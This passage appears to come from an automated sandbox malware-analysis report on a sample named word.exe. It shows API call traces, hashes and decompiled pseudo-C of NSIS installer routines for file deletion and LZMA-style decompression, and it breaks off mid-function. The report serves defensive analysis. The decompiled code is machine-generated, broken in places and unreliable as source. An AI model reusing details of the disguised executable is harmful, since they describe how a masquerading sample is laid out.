                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,C:\Users\user\AppData\Roaming\word.exe,00000000,00000000), ref: 00403500
                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,C:\Users\user\AppData\Roaming\word.exe,00000000,00000000), ref: 0040350C
                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403518
                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040351F
                                                          • DeleteFileA.KERNEL32(0041F0E8,0041F0E8,?,00424000,?), ref: 00403569
                                                          • CopyFileA.KERNEL32 ref: 0040357D
                                                          • CloseHandle.KERNEL32(00000000), ref: 004035AA
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004035FF
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 0040363B
                                                          • ExitProcess.KERNEL32 ref: 0040365E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ExitFileProcess$Directory$CurrentDeleteHandleWindowslstrcat$CharCloseCommandCopyCreateInfoInitializeLineModuleNextPathTempUninitializelstrcmpilstrcpyn
                                                          • String ID: /D=$ _?=$"$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                          • API String ID: 3411505140-3365946949
                                                          • Opcode ID: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                                                          • Instruction ID: 185554a669e391af13640c5e948e6a5ed170759bbde9d6c9181f60cdac0bc0dd
                                                          • Opcode Fuzzy Hash: 462f336be7425baa29b142cb7ae5a0ad3fe5dbea02ff1f081f28f080f31ceddd
                                                          • Instruction Fuzzy Hash: 2691E330A08341BED7216F619D49B2B7EACEB44306F44093BF541B62E2C77C9E058B6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 349 405426-405443 call 4056c8 352 405445-405457 DeleteFileA 349->352 353 40545c-405464 349->353 354 4055e1-4055e4 352->354 355 405466-405468 353->355 356 405477-405487 call 405af4 353->356 357 40558c-405592 355->357 358 40546e-405471 355->358 362 405496-405497 call 40562e 356->362 363 405489-405494 lstrcatA 356->363 357->354 361 405594-405597 357->361 358->356 358->357 364 4055a1-4055a9 call 405d9c 361->364 365 405599-40559f 361->365 366 40549c-4054c5 lstrcatA lstrlenA FindFirstFileA 362->366 363->366 364->354 374 4055ab-4055c0 call 4055e7 call 4057ac RemoveDirectoryA 364->374 365->354 369 405582-405586 366->369 370 4054cb-4054e2 call 405612 366->370 369->357 372 405588 369->372 378 4054e4-4054e8 370->378 379 4054ed-4054f0 370->379 372->357 389 4055c2-4055c6 374->389 390 4055d9-4055dc call 404e9f 374->390 378->379 381 4054ea 378->381 382 4054f2-4054f7 379->382 383 405503-405511 call 405af4 379->383 381->379 386 405561-405573 FindNextFileA 382->386 387 4054f9-4054fb 382->387 394 405513-40551b 383->394 395 405528-405537 call 4057ac DeleteFileA 383->395 386->370 392 405579-40557c FindClose 386->392 387->383 388 4054fd-405501 387->388 388->383 388->386 389->365 393 4055c8-4055d7 call 404e9f call 405842 389->393 390->354 392->369 393->354 394->386 398 40551d-405526 call 405426 394->398 405 405559-40555c call 404e9f 395->405 406 405539-40553d 395->406 398->386 405->386 409 405551-405557 406->409 410 40553f-40554f call 404e9f call 405842 406->410 409->386 410->386
                                                          C-Code - Quality: 94%
                                                          			E00405426(void* __edi, void* __eflags, signed int _a4, signed int _a8) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				struct _WIN32_FIND_DATAA _v332;
                                                          				signed int _t38;
                                                          				char* _t50;
                                                          				signed int _t53;
                                                          				signed int _t56;
                                                          				signed int _t62;
                                                          				signed int _t64;
                                                          				void* _t66;
                                                          				CHAR* _t67;
                                                          				signed char _t68;
                                                          				CHAR* _t71;
                                                          				char* _t75;
                                                          
                                                          				_t67 = _a4;
                                                          				_t38 = E004056C8(__eflags, _t67);
                                                          				_t68 = _a8;
                                                          				_v12 = _t38;
                                                          				if((_t68 & 0x00000008) != 0) {
                                                          					_t64 = DeleteFileA(_t67); // executed
                                                          					asm("sbb eax, eax");
                                                          					_t66 =  ~_t64 + 1;
                                                          					 *0x423fa8 =  *0x423fa8 + _t66;
                                                          					return _t66;
                                                          				}
                                                          				_a4 = _t68;
                                                          				_t7 =  &_a4;
                                                          				 *_t7 = _a4 & 0x00000001;
                                                          				__eflags =  *_t7;
                                                          				if( *_t7 == 0) {
                                                          					L5:
                                                          					E00405AF4(0x421538, _t67);
                                                          					__eflags = _a4;
                                                          					if(_a4 == 0) {
                                                          						E0040562E(_t67);
                                                          					} else {
                                                          						lstrcatA(0x421538, "\*.*");
                                                          					}
                                                          					lstrcatA(_t67, 0x409010);
                                                          					_t71 =  &(_t67[lstrlenA(_t67)]); // executed
                                                          					_t38 = FindFirstFileA(0x421538,  &_v332); // executed
                                                          					__eflags = _t38 - 0xffffffff;
                                                          					_v8 = _t38;
                                                          					if(_t38 == 0xffffffff) {
                                                          						L26:
                                                          						__eflags = _a4;
                                                          						if(_a4 != 0) {
                                                          							_t32 = _t71 - 1;
                                                          							 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                          							__eflags =  *_t32;
                                                          						}
                                                          						goto L28;
                                                          					} else {
                                                          						goto L9;
                                                          					}
                                                          					do {
                                                          						L9:
                                                          						_t75 =  &(_v332.cFileName);
                                                          						_t50 = E00405612( &(_v332.cFileName), 0x3f);
                                                          						__eflags =  *_t50;
                                                          						if( *_t50 != 0) {
                                                          							__eflags = _v332.cAlternateFileName;
                                                          							if(_v332.cAlternateFileName != 0) {
                                                          								_t75 =  &(_v332.cAlternateFileName);
                                                          							}
                                                          						}
                                                          						__eflags =  *_t75 - 0x2e;
                                                          						if( *_t75 != 0x2e) {
                                                          							L16:
                                                          							E00405AF4(_t71, _t75);
                                                          							__eflags = _v332.dwFileAttributes & 0x00000010;
                                                          							if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                          								E004057AC(_t67);
                                                          								_t53 = DeleteFileA(_t67);
                                                          								__eflags = _t53;
                                                          								if(_t53 != 0) {
                                                          									E00404E9F(0xfffffff2, _t67);
                                                          								} else {
                                                          									__eflags = _a8 & 0x00000004;
                                                          									if((_a8 & 0x00000004) == 0) {
                                                          										 *0x423fa8 =  *0x423fa8 + 1;
                                                          									} else {
                                                          										E00404E9F(0xfffffff1, _t67);
                                                          										_push(0);
                                                          										_push(_t67);
                                                          										E00405842();
                                                          									}
                                                          								}
                                                          							} else {
                                                          								__eflags = (_a8 & 0x00000003) - 3;
                                                          								if(__eflags == 0) {
                                                          									E00405426(_t71, __eflags, _t67, _a8);
                                                          								}
                                                          							}
                                                          							goto L24;
                                                          						}
                                                          						_t62 =  *((intOrPtr*)(_t75 + 1));
                                                          						__eflags = _t62;
                                                          						if(_t62 == 0) {
                                                          							goto L24;
                                                          						}
                                                          						__eflags = _t62 - 0x2e;
                                                          						if(_t62 != 0x2e) {
                                                          							goto L16;
                                                          						}
                                                          						__eflags =  *((char*)(_t75 + 2));
                                                          						if( *((char*)(_t75 + 2)) == 0) {
                                                          							goto L24;
                                                          						}
                                                          						goto L16;
                                                          						L24:
                                                          						_t56 = FindNextFileA(_v8,  &_v332); // executed
                                                          						__eflags = _t56;
                                                          					} while (_t56 != 0);
                                                          					_t38 = FindClose(_v8); // executed
                                                          					goto L26;
                                                          				} else {
                                                          					__eflags = _t38;
                                                          					if(_t38 == 0) {
                                                          						L28:
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L36:
                                                          							return _t38;
                                                          						}
                                                          						__eflags = _v12;
                                                          						if(_v12 != 0) {
                                                          							_t38 = E00405D9C(_t67);
                                                          							__eflags = _t38;
                                                          							if(_t38 == 0) {
                                                          								goto L36;
                                                          							}
                                                          							E004055E7(_t67);
                                                          							E004057AC(_t67);
                                                          							_t38 = RemoveDirectoryA(_t67); // executed
                                                          							__eflags = _t38;
                                                          							if(_t38 != 0) {
                                                          								return E00404E9F(0xffffffe5, _t67);
                                                          							}
                                                          							__eflags = _a8 & 0x00000004;
                                                          							if((_a8 & 0x00000004) == 0) {
                                                          								goto L30;
                                                          							}
                                                          							E00404E9F(0xfffffff1, _t67);
                                                          							_push(0);
                                                          							_push(_t67);
                                                          							return E00405842();
                                                          						}
                                                          						L30:
                                                          						 *0x423fa8 =  *0x423fa8 + 1;
                                                          						return _t38;
                                                          					}
                                                          					__eflags = _t68 & 0x00000002;
                                                          					if((_t68 & 0x00000002) == 0) {
                                                          						goto L28;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          			}


















                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,755513E0,00000000), ref: 00405446
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 0040548F
                                                          • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 004054A2
                                                          • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 004054A8
                                                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*,?,C:\Users\user\AppData\Roaming\word.exe,?,755513E0,00000000), ref: 004054B9
                                                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040556B
                                                          • FindClose.KERNELBASE(?), ref: 0040557C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\*.*$C:\Users\user\AppData\Roaming\word.exe$\*.*
                                                          • API String ID: 2035342205-1670639503
                                                          • Opcode ID: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                                                          • Instruction ID: 72c9b9ae93c356e5fbaabc5fff99037f1728fc53f432d7f95e6e75a23a32325d
                                                          • Opcode Fuzzy Hash: 178659d5dd2b5e4005abbb3c6ac50f0bcaef0d38e253c4ce23e3dec6c8ab0d63
                                                          • Instruction Fuzzy Hash: C941D070804A087ACB21AB358C85BEF3A6DDF01355F14847BB846B61D6C63C9E81CEAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405D9C(CHAR* _a4) {
                                                          				void* _t3;
                                                          				void* _t8;
                                                          
                                                          				SetErrorMode(0x8001); // executed
                                                          				_t3 = FindFirstFileA(_a4, 0x422580); // executed
                                                          				_t8 = _t3; // executed
                                                          				SetErrorMode(0); // executed
                                                          				if(_t8 == 0xffffffff) {
                                                          					return 0;
                                                          				}
                                                          				FindClose(_t8); // executed
                                                          				return 0x422580;
                                                          			}






                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0), ref: 00405DAA
                                                          • FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                                                          • SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                                                          • FindClose.KERNELBASE(00000000), ref: 00405DC8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ErrorFindMode$CloseFileFirst
                                                          • String ID: C:\
                                                          • API String ID: 2885216544-3404278061
                                                          • Opcode ID: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                                                          • Instruction ID: a6a8c167051aeed94988b7bc9a417df50a67df51a882c0690b661480960f0059
                                                          • Opcode Fuzzy Hash: 863b284ad5a92f7a1a8a6f5dd5e6c1c033b4ab17d74f49b76f5d02ce1b12dfb3
                                                          • Instruction Fuzzy Hash: A8E08632B0455067C20017B46D4CE073658DF85721F208533B240B62D0D5B55C118BFA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 98%
                                                          			E00406083() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				void* _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t590;
                                                          				signed int* _t607;
                                                          				void* _t614;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t614 - 0x40) != 0) {
                                                          						 *(_t614 - 0x34) = 1;
                                                          						 *(_t614 - 0x84) = 7;
                                                          						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                          						L132:
                                                          						 *(_t614 - 0x54) = _t607;
                                                          						L133:
                                                          						_t531 =  *_t607;
                                                          						_t590 = _t531 & 0x0000ffff;
                                                          						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                          						if( *(_t614 - 0xc) >= _t565) {
                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                          							 *(_t614 - 0x40) = 1;
                                                          							_t532 = _t531 - (_t531 >> 5);
                                                          							 *_t607 = _t532;
                                                          						} else {
                                                          							 *(_t614 - 0x10) = _t565;
                                                          							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                          							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                          						}
                                                          						if( *(_t614 - 0x10) >= 0x1000000) {
                                                          							L139:
                                                          							_t533 =  *(_t614 - 0x84);
                                                          							L140:
                                                          							 *(_t614 - 0x88) = _t533;
                                                          							goto L1;
                                                          						} else {
                                                          							L137:
                                                          							if( *(_t614 - 0x6c) == 0) {
                                                          								 *(_t614 - 0x88) = 5;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                          							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                          							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                          							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                          							goto L139;
                                                          						}
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          						__esi =  *(__ebp - 0x60);
                                                          						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          						__ecx =  *(__ebp - 0x3c);
                                                          						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          						__ecx =  *(__ebp - 4);
                                                          						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          						if( *(__ebp - 0x38) >= 4) {
                                                          							if( *(__ebp - 0x38) >= 0xa) {
                                                          								_t97 = __ebp - 0x38;
                                                          								 *_t97 =  *(__ebp - 0x38) - 6;
                                                          							} else {
                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          							}
                                                          						} else {
                                                          							 *(__ebp - 0x38) = 0;
                                                          						}
                                                          						if( *(__ebp - 0x34) == __edx) {
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							L60:
                                                          							__eax =  *(__ebp - 0x58);
                                                          							__edx = __ebx + __ebx;
                                                          							__ecx =  *(__ebp - 0x10);
                                                          							__esi = __edx + __eax;
                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edi = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								_t216 = __edx + 1; // 0x1
                                                          								__ebx = _t216;
                                                          								__cx = __ax >> 5;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edi;
                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								L59:
                                                          								if(__ebx >= 0x100) {
                                                          									goto L54;
                                                          								}
                                                          								goto L60;
                                                          							} else {
                                                          								L57:
                                                          								if( *(__ebp - 0x6c) == 0) {
                                                          									 *(__ebp - 0x88) = 0xf;
                                                          									goto L170;
                                                          								}
                                                          								__ecx =  *(__ebp - 0x70);
                                                          								__eax =  *(__ebp - 0xc);
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								_t202 = __ebp - 0x70;
                                                          								 *_t202 =  *(__ebp - 0x70) + 1;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								goto L59;
                                                          							}
                                                          						} else {
                                                          							__eax =  *(__ebp - 0x14);
                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                          							}
                                                          							__ecx =  *(__ebp - 8);
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                          							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          							L40:
                                                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          							__ecx =  *(__ebp - 0x58);
                                                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          							 *(__ebp - 0x48) = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          							__ax =  *__esi;
                                                          							 *(__ebp - 0x54) = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          								__cx = __ax;
                                                          								 *(__ebp - 0x40) = 1;
                                                          								__cx = __ax >> 5;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          								 *(__ebp - 0x10) = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                          								L38:
                                                          								__eax =  *(__ebp - 0x40);
                                                          								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          									while(1) {
                                                          										if(__ebx >= 0x100) {
                                                          											break;
                                                          										}
                                                          										__eax =  *(__ebp - 0x58);
                                                          										__edx = __ebx + __ebx;
                                                          										__ecx =  *(__ebp - 0x10);
                                                          										__esi = __edx + __eax;
                                                          										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          										__ax =  *__esi;
                                                          										 *(__ebp - 0x54) = __esi;
                                                          										__edi = __ax & 0x0000ffff;
                                                          										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          										if( *(__ebp - 0xc) >= __ecx) {
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          											__cx = __ax;
                                                          											_t169 = __edx + 1; // 0x1
                                                          											__ebx = _t169;
                                                          											__cx = __ax >> 5;
                                                          											 *__esi = __ax;
                                                          										} else {
                                                          											 *(__ebp - 0x10) = __ecx;
                                                          											0x800 = 0x800 - __edi;
                                                          											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          											__ebx = __ebx + __ebx;
                                                          											 *__esi = __cx;
                                                          										}
                                                          										 *(__ebp - 0x44) = __ebx;
                                                          										if( *(__ebp - 0x10) < 0x1000000) {
                                                          											L45:
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t155 = __ebp - 0x70;
                                                          											 *_t155 =  *(__ebp - 0x70) + 1;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          										}
                                                          									}
                                                          									L53:
                                                          									_t172 = __ebp - 0x34;
                                                          									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                          									L54:
                                                          									__al =  *(__ebp - 0x44);
                                                          									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          									L55:
                                                          									if( *(__ebp - 0x64) == 0) {
                                                          										 *(__ebp - 0x88) = 0x1a;
                                                          										goto L170;
                                                          									}
                                                          									__ecx =  *(__ebp - 0x68);
                                                          									__al =  *(__ebp - 0x5c);
                                                          									__edx =  *(__ebp - 8);
                                                          									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          									 *( *(__ebp - 0x68)) = __al;
                                                          									__ecx =  *(__ebp - 0x14);
                                                          									 *(__ecx +  *(__ebp - 8)) = __al;
                                                          									__eax = __ecx + 1;
                                                          									__edx = 0;
                                                          									_t191 = __eax %  *(__ebp - 0x74);
                                                          									__eax = __eax /  *(__ebp - 0x74);
                                                          									__edx = _t191;
                                                          									L79:
                                                          									 *(__ebp - 0x14) = __edx;
                                                          									L80:
                                                          									 *(__ebp - 0x88) = 2;
                                                          									goto L1;
                                                          								}
                                                          								if(__ebx >= 0x100) {
                                                          									goto L53;
                                                          								}
                                                          								goto L40;
                                                          							} else {
                                                          								L36:
                                                          								if( *(__ebp - 0x6c) == 0) {
                                                          									 *(__ebp - 0x88) = 0xd;
                                                          									L170:
                                                          									_t568 = 0x22;
                                                          									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                          									_t535 = 0;
                                                          									L172:
                                                          									return _t535;
                                                          								}
                                                          								__ecx =  *(__ebp - 0x70);
                                                          								__eax =  *(__ebp - 0xc);
                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								_t121 = __ebp - 0x70;
                                                          								 *_t121 =  *(__ebp - 0x70) + 1;
                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          								goto L38;
                                                          							}
                                                          						}
                                                          					}
                                                          					L1:
                                                          					_t534 =  *(_t614 - 0x88);
                                                          					if(_t534 > 0x1c) {
                                                          						L171:
                                                          						_t535 = _t534 | 0xffffffff;
                                                          						goto L172;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                                                          						case 0:
                                                          							if( *(_t614 - 0x6c) == 0) {
